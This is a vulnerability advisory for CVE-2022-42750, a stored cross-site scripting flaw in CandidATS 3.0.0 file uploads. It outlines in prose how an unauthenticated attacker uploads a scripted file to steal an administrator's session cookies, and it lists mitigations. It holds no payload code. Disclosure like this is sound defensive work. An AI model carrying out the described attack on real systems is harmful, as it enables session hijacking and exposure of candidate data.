CVE-2022-42750

Vulnerability

CandidATS version 3.0.0 contains a stored cross-site scripting (XSS) vulnerability in the file upload functionality. The application does not correctly validate files uploaded by users, allowing an attacker to inject malicious scripts. The vulnerability is exploitable without authentication, though user interaction is required. The affected version is 3.0.0 only. [1][2]

Exploitation

An unauthenticated remote attacker can craft a malicious file containing JavaScript code and upload it to the application. The attacker then forces a victim—for example an administrator—to view the uploaded file. When the victim's browser renders the file, the stored XSS payload executes, stealing the victim's session cookies. The attacker can use the stolen cookies to hijack the victim's session, achieving account takeover. [2]

Impact

Successful exploitation allows the attacker to steal cookies of arbitrary users, leading to session hijacking and full account takeover. For an administrator account, the attacker gains complete control over the CandidATS instance, including access to sensitive candidate data and system configurations. The CIA impact is high across confidentiality, integrity, and availability. [2]

Mitigation

As of the public disclosure date (October 27, 2022), no patch is available for CandidATS 3.0.0. The vendor was contacted but has not released a fix. Users are advised to restrict file upload privileges, use a web application firewall (WAF) to block XSS payloads, and monitor for suspicious file uploads. This vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date. [2]